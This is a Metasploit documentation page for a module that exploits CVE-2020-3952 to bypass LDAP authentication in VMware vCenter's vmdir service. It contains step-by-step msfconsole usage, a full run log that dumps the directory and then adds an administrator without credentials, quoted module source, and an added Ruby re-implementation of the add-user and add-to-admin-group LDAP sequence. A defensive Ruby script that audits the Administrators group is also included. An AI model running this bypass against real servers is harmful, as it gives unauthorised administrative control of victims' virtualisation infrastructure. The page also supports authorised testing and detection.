VMware vCenter Server vmdir Authentication Bypass - Metasploit


This page contains detailed information about how to use the auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: VMware vCenter Server vmdir Authentication Bypass
Module: auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
Source code: modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb
Disclosure date: 2020-04-09
Last modification time: 2022-01-12 16:51:40 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 636
List of CVEs: CVE-2020-3952

This module bypasses LDAP authentication in VMware vCenter Server's vmdir service to add an arbitrary administrator user. vCenter Server 6.7 prior to the 6.7U3f update is vulnerable, but only if it was upgraded from a previous release line such as 6.0 or 6.5; a clean 6.7 installation is not affected (VMSA-2020-0006).

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

  • service-resource-loss: Module may cause a resource (such as a file or data in a database) to be unavailable for the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • config-changes: Module modifies some configuration setting on the target machine.

Basic Usage


msf > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > show actions
    ... a list of actions (this module has one, Add) ...
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > set ACTION Add
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > show options
    ... show and set options (RHOSTS, USERNAME, PASSWORD) ...
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > check
    ... runs the CheckModule against the target and reports whether it is vulnerable ...
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > run

This is an auxiliary module, so it has actions rather than targets; `exploit` is accepted as an alias for `run`.

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • CheckModule: Module to check with (an advanced option that defaults to auxiliary/gather/vmware_vcenter_vmdir_ldap, which also discovers the base DN and dumps the directory before the bypass is attempted)

USERNAME and PASSWORD are marked optional, but the Add action exits with an error unless both are set.

Knowledge Base


Vulnerable Application


Description

This module bypasses LDAP authentication in VMware vCenter Server's vmdir service to add an arbitrary administrator user. vCenter Server 6.7 prior to the 6.7U3f update is vulnerable, but only if it was upgraded from a previous release line such as 6.0 or 6.5; a clean 6.7 installation is not affected (VMSA-2020-0006).

Setup

Tested in the wild. No setup notes available at this time, as setup will be specific to target environment.

Verification Steps


Follow Setup and Scenarios.

Actions


Add

Add an admin user to the vCenter Server.

Options


BASE_DN

If you already know the LDAP base DN (dc=vsphere,dc=local on a default deployment), set it here. Otherwise the module discovers it from the namingcontexts attribute of the root DSE.

USERNAME

The username of the admin user to create. The add fails if an entry with that name already exists.

PASSWORD

The password for the new admin user. It must satisfy the vmdir password and lockout policy, which the check module prints before the bypass is attempted; a password that does not meet the policy fails with a constraint violation.
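The LDAP operations behind the Add action, written out as an added example that is not the module's own code. It takes a duck-typed client whose search, add, add_attribute and get_operation_result methods follow the Net::LDAP names seen in the module's snippets, and ships with FakeVmdir, a constructed in-memory stand-in, so it runs offline (driving a real Net::LDAP connection would need a thin adapter, since Net::LDAP expresses search scope with its own constants rather than the :base symbol used here). The cn=Users container and the AD-style attribute set are assumptions; the group DN cn=Administrators,cn=Builtin,<base_dn> and the result codes are the ones the module's own error handling distinguishes.

```ruby
# Added example (not the Metasploit module's own code): the LDAP operation
# sequence behind the Add action, against a duck-typed client so it runs
# offline. FakeVmdir is a constructed in-memory stand-in for vmdir.

# Standard LDAP result codes (RFC 4511) that the module distinguishes.
CONSTRAINT_VIOLATION       = 19
ATTRIBUTE_OR_VALUE_EXISTS  = 20
INSUFFICIENT_ACCESS_RIGHTS = 50
ENTRY_ALREADY_EXISTS       = 68

OpResult = Struct.new(:code, :message, :error_message)
SUCCESS  = OpResult.new(0, 'Success', '')

# Base DN discovery when BASE_DN is unset: namingContexts from the root DSE
# (empty base, base scope), as the module's check does.
def discover_base_dn(ldap)
  dse = ldap.search(base: '', scope: :base, attributes: ['namingContexts']).first
  dse && Array(dse[:namingcontexts]).first
end

# User entry to add. Assumption: an AD-style user object with userPassword
# set at creation; the module's exact attribute set is in its source.
def user_attributes(username, password, base_dn)
  domain = base_dn.scan(/dc=([^,]+)/i).flatten.join('.')
  { objectClass: %w[top person organizationalPerson user],
    cn: username, sn: username, sAMAccountName: username,
    userPrincipalName: "#{username}@#{domain}", userPassword: password }
end

# Add the user, then make it a member of the Builtin Administrators group.
# Returns a status symbol instead of printing, so callers can branch on it.
def add_admin(ldap, username, password, base_dn)
  user_dn  = "cn=#{username},cn=Users,#{base_dn}" # cn=Users container assumed
  group_dn = "cn=Administrators,cn=Builtin,#{base_dn}"

  unless ldap.add(dn: user_dn, attributes: user_attributes(username, password, base_dn))
    case ldap.get_operation_result.code
    when INSUFFICIENT_ACCESS_RIGHTS then return :bypass_failed # ACLs enforced: patched
    when ENTRY_ALREADY_EXISTS       then return :user_exists
    when CONSTRAINT_VIOLATION       then return :password_policy
    else return :add_failed
    end
  end

  return :added if ldap.add_attribute(group_dn, 'member', user_dn)
  return :already_admin if ldap.get_operation_result.code == ATTRIBUTE_OR_VALUE_EXISTS
  :group_failed
end

# Constructed stand-in for vmdir: patched: true models a fixed server that
# rejects the add; min_password_length models the vmdir password policy.
class FakeVmdir
  attr_reader :entries, :members, :result
  alias get_operation_result result

  def initialize(base_dn, patched: false, min_password_length: 8)
    @base_dn, @patched, @min_len = base_dn, patched, min_password_length
    @entries = {}
    @members = Hash.new { |h, k| h[k] = [] }
    @result  = SUCCESS
  end

  def search(base:, scope:, attributes:)
    return [] unless base == '' && scope == :base
    [{ namingcontexts: [@base_dn] }]
  end

  def add(dn:, attributes:)
    return fail_with(INSUFFICIENT_ACCESS_RIGHTS, 'Insufficient Access Rights') if @patched
    return fail_with(ENTRY_ALREADY_EXISTS, 'Entry Already Exists') if @entries.key?(dn)
    return fail_with(CONSTRAINT_VIOLATION, 'Constraint Violation') if attributes[:userPassword].to_s.length < @min_len

    @entries[dn] = attributes
    @result = SUCCESS
    true
  end

  def add_attribute(dn, attribute, value)
    return fail_with(ATTRIBUTE_OR_VALUE_EXISTS, 'Attribute Or Value Exists') if @members[dn].include?([attribute, value])

    @members[dn] << [attribute, value]
    @result = SUCCESS
    true
  end

  private

  def fail_with(code, message)
    @result = OpResult.new(code, message, '')
    false
  end
end
```

Against a fresh FakeVmdir, add_admin(dir, 'msfadmin', 'msfadmin', base) returns :added and the same call repeated returns :user_exists, which matches the ordering of the module's own checks. An insufficientAccessRights (50) answer to the unauthenticated add is the signature of a patched target; on a vulnerable one the add goes through without a bind.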

Scenarios


VMware vCenter Server 6.7 virtual appliance on ESXi

msf5 > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > options

Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   BASE_DN                    no        LDAP base DN if you already have it
   PASSWORD                   no        Password of admin user to add
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     636              yes       The target port
   SSL       true             no        Enable SSL on the LDAP connection
   USERNAME                   no        Username of admin user to add


Auxiliary action:

   Name  Description
   ----  -----------
   Add   Add an admin user


msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set rhosts [redacted]
rhosts => [redacted]
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set username msfadmin
username => msfadmin
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set password msfadmin
password => msfadmin
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run
[*] Running module against [redacted]
not verifying SSL hostname of LDAPS server '[redacted]:636'

[*] Using auxiliary/gather/vmware_vcenter_vmdir_ldap as check
[*] Discovering base DN automatically
[*] Searching root DSE for base DN
dn: cn=DSE Root
namingcontexts: dc=vsphere,dc=local
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.1
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.2
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.3
supportedcontrol: 1.2.840.113556.1.4.417
supportedcontrol: 1.2.840.113556.1.4.319
supportedldapversion: 3
supportedsaslmechanisms: GSSAPI

[+] Discovered base DN: dc=vsphere,dc=local
[*] Dumping LDAP data from vmdir service at [redacted]:636
[+] [redacted]:636 is vulnerable to CVE-2020-3952
[*] Storing LDAP data in loot
[+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002255_default_[redacted]_VMwarevCenterS_975097.txt
[*] Password and lockout policy:
vmwpasswordchangeautounlockintervalsec: [redacted]
vmwpasswordchangefailedattemptintervalsec: [redacted]
vmwpasswordchangemaxfailedattempts: [redacted]
vmwpasswordlifetimedays: [redacted]
vmwpasswordmaxidenticaladjacentchars: [redacted]
vmwpasswordmaxlength: [redacted]
vmwpasswordminalphabeticcount: [redacted]
vmwpasswordminlength: [redacted]
vmwpasswordminlowercasecount: [redacted]
vmwpasswordminnumericcount: [redacted]
vmwpasswordminspecialcharcount: [redacted]
vmwpasswordminuppercasecount: [redacted]
vmwpasswordprohibitedpreviouscount: [redacted]

[+] Credentials found: [redacted]
[snip]
[*] Bypassing LDAP auth in vmdir service at [redacted]:636
[*] Adding admin user msfadmin with password msfadmin
[+] Added user msfadmin, so auth bypass was successful!
[+] Added user msfadmin to admin group
[*] Auxiliary module execution completed
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) >
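The run above ends with msfadmin added to the admin group, which is the durable change a defender can look for. What follows is an added example, not part of the module or of this page, that parses an LDIF export of the Builtin Administrators entry (as an ldapsearch of cn=Administrators,cn=Builtin,dc=vsphere,dc=local would produce) and reports members missing from a known baseline. The LDIF and baseline in the block are constructed; the svc-backup account is invented for the sample.

```ruby
# Added example (not part of the module or its documentation): audit the
# Builtin Administrators group against a known baseline. The module's
# lasting change is a new member on cn=Administrators,cn=Builtin,<base_dn>,
# so that entry is what to export and compare. SAMPLE_LDIF is constructed
# and includes a folded line and a base64 ("::") value, both of which
# ldapsearch emits for long or non-ASCII DNs.

# Minimal LDIF reader: unfolds continuation lines, decodes "::" values,
# returns one hash per entry, attribute names downcased, values as arrays.
def parse_ldif(text)
  entries = []
  current = nil
  text.gsub(/\r?\n /, '').each_line do |raw| # join folded lines first
    line = raw.chomp
    if line.empty?
      entries << current if current
      current = nil
      next
    end
    next if line.start_with?('#')

    name, sep, value = line.partition(/::? ?/)
    value = value.unpack1('m') if sep.start_with?('::') # base64 value
    current ||= Hash.new { |h, k| h[k] = [] }
    current[name.downcase] << value
  end
  entries << current if current
  entries
end

# Members of the group entry that are not in the baseline. DNs compare
# case-insensitively. Raises if the export does not contain the group.
def unexpected_admins(ldif, baseline, group_dn: 'cn=Administrators,cn=Builtin,dc=vsphere,dc=local')
  entry = parse_ldif(ldif).find { |e| e['dn'].any? { |dn| dn.casecmp?(group_dn) } }
  raise ArgumentError, "#{group_dn} not present in export" unless entry

  allowed = baseline.map(&:downcase)
  entry['member'].reject { |m| allowed.include?(m.downcase) }
end

# Constructed export; a real one comes from the live directory.
SAMPLE_LDIF = [
  'dn: cn=Administrators,cn=Builtin,dc=vsphere,dc=local',
  'objectClass: group',
  'cn: Administrators',
  'member: cn=Administrator,cn=Users,dc=vsphere,dc=local',
  'member: cn=svc-backup,cn=Users,dc=vsphere,dc=lo', # value folded onto
  ' cal',                                             # a continuation line
  "member:: #{['cn=msfadmin,cn=Users,dc=vsphere,dc=local'].pack('m0')}",
  ''
].join("\n")

# Constructed baseline of members that are expected to be there.
BASELINE = [
  'cn=Administrator,cn=Users,dc=vsphere,dc=local',
  'cn=svc-backup,cn=Users,dc=vsphere,dc=local'
].freeze

unexpected_admins(SAMPLE_LDIF, BASELINE).each { |dn| puts "unexpected admin: #{dn}" }
```

Feed a real export in place of SAMPLE_LDIF. The parser handles wrapped lines and base64 values deliberately: a member DN that ldapsearch folded or encoded would otherwise slip past a naive grep for the attacker's username.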


Msfconsole Usage


Here is how the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass

msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show info

       Name: VMware vCenter Server vmdir Authentication Bypass
     Module: auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2020-04-09

Provided by:
  Hynek Petrak
  JJ Lehmann
  Ofri Ziv
  wvu

Module side effects:
 ioc-in-logs
 config-changes

Module stability:
 service-resource-loss

Available actions:
  Name  Description
  ----  -----------
  Add   Add an admin user

Check supported:
  Yes

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  BASE_DN                    no        LDAP base DN if you already have it
  BIND_DN                    no        The username to authenticate to LDAP server
  BIND_PW                    no        Password for the BIND_DN
  PASSWORD                   no        Password of admin user to add
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     636              yes       The target port
  SSL       true             no        Enable SSL on the LDAP connection
  USERNAME                   no        Username of admin user to add

Description:
  This module bypasses LDAP authentication in VMware vCenter Server's 
  vmdir service to add an arbitrary administrator user. Version 6.7 
  prior to the 6.7U3f update is vulnerable, only if upgraded from a 
  previous release line, such as 6.0 or 6.5.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-3952
  https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/
  https://www.vmware.com/security/advisories/VMSA-2020-0006.html

Module Options


This is a complete list of options available in the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module:

msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show options

Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   BASE_DN                    no        LDAP base DN if you already have it
   BIND_DN                    no        The username to authenticate to LDAP server
   BIND_PW                    no        Password for the BIND_DN
   PASSWORD                   no        Password of admin user to add
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     636              yes       The target port
   SSL       true             no        Enable SSL on the LDAP connection
   USERNAME                   no        Username of admin user to add

Auxiliary action:

   Name  Description
   ----  -----------
   Add   Add an admin user

Advanced Options


Here is a complete list of advanced options supported by the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module:

msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show advanced

Module advanced options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):

   Name                  Current Setting                             Required  Description
   ----                  ---------------                             --------  -----------
   CheckModule           auxiliary/gather/vmware_vcenter_vmdir_ldap  yes       Module to check with
   LDAP::ConnectTimeout  10.0                                        yes       Timeout for LDAP connect
   VERBOSE               false                                       no        Enable detailed status messages
   WORKSPACE                                                         no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the admin/ldap/vmware_vcenter_vmdir_auth_bypass module can do:

msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------
   Add   Add an admin user

Evasion Options


Here is the full list of possible evasion options supported by the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.). This module defines none, so the table is empty:

msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages:

Check the possible causes in the code snippets below, taken from the module source; this often helps identify the root cause of the problem.

Please set the USERNAME and PASSWORD options to proceed


Here is a relevant code snippet related to the "Please set the USERNAME and PASSWORD options to proceed" error message:

    "cn=Administrators,cn=Builtin,#{base_dn}"
  end

  def run
    unless username && password
      print_error('Please set the USERNAME and PASSWORD options to proceed')
      return
    end

    # NOTE: check is provided by auxiliary/gather/vmware_vcenter_vmdir_ldap
    checkcode = check

Failed to add admin user <USERNAME>


Here is a relevant code snippet related to the "Failed to add admin user <USERNAME>" error message:

      auth_bypass(ldap)

      print_status("Adding admin user #{username} with password #{password}")

      unless add_admin(ldap)
        print_error("Failed to add admin user #{username}")
      end
    end
  rescue Net::LDAP::Error => e
    print_error("#{e.class}: #{e.message}")
  end

Failed to bypass LDAP auth in vmdir service


Here is a relevant code snippet related to the "Failed to bypass LDAP auth in vmdir service" error message:

    unless ldap.add(dn: user_dn, attributes: user_info)
      res = ldap.get_operation_result

      case res.code
      when Net::LDAP::ResultCodeInsufficientAccessRights
        print_error('Failed to bypass LDAP auth in vmdir service')
      when Net::LDAP::ResultCodeEntryAlreadyExists
        print_error("User #{username} already exists")
      when Net::LDAP::ResultCodeConstraintViolation
        print_error("Password #{password} does not meet policy requirements")
      else

User <USERNAME> already exists


Here is a relevant code snippet related to the "User <USERNAME> already exists" error message:

      case res.code
      when Net::LDAP::ResultCodeInsufficientAccessRights
        print_error('Failed to bypass LDAP auth in vmdir service')
      when Net::LDAP::ResultCodeEntryAlreadyExists
        print_error("User #{username} already exists")
      when Net::LDAP::ResultCodeConstraintViolation
        print_error("Password #{password} does not meet policy requirements")
      else
        print_error("#{res.message}: #{res.error_message}")
      end

Password <PASSWORD> does not meet policy requirements


Here is a relevant code snippet related to the "Password <PASSWORD> does not meet policy requirements" error message:

      when Net::LDAP::ResultCodeInsufficientAccessRights
        print_error('Failed to bypass LDAP auth in vmdir service')
      when Net::LDAP::ResultCodeEntryAlreadyExists
        print_error("User #{username} already exists")
      when Net::LDAP::ResultCodeConstraintViolation
        print_error("Password #{password} does not meet policy requirements")
      else
        print_error("#{res.message}: #{res.error_message}")
      end

      return false

User <USERNAME> is already an admin


Here is a relevant code snippet related to the "User <USERNAME> is already an admin" error message:

    # Add our user to the admin group
    unless ldap.add_attribute(group_dn, 'member', user_dn)
      res = ldap.get_operation_result

      if res.code == Net::LDAP::ResultCodeAttributeOrValueExists
        print_error("User #{username} is already an admin")
      else
        print_error("#{res.message}: #{res.error_message}")
      end

      return false



Authors


  • Hynek Petrak
  • JJ Lehmann
  • Ofri Ziv
  • wvu

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
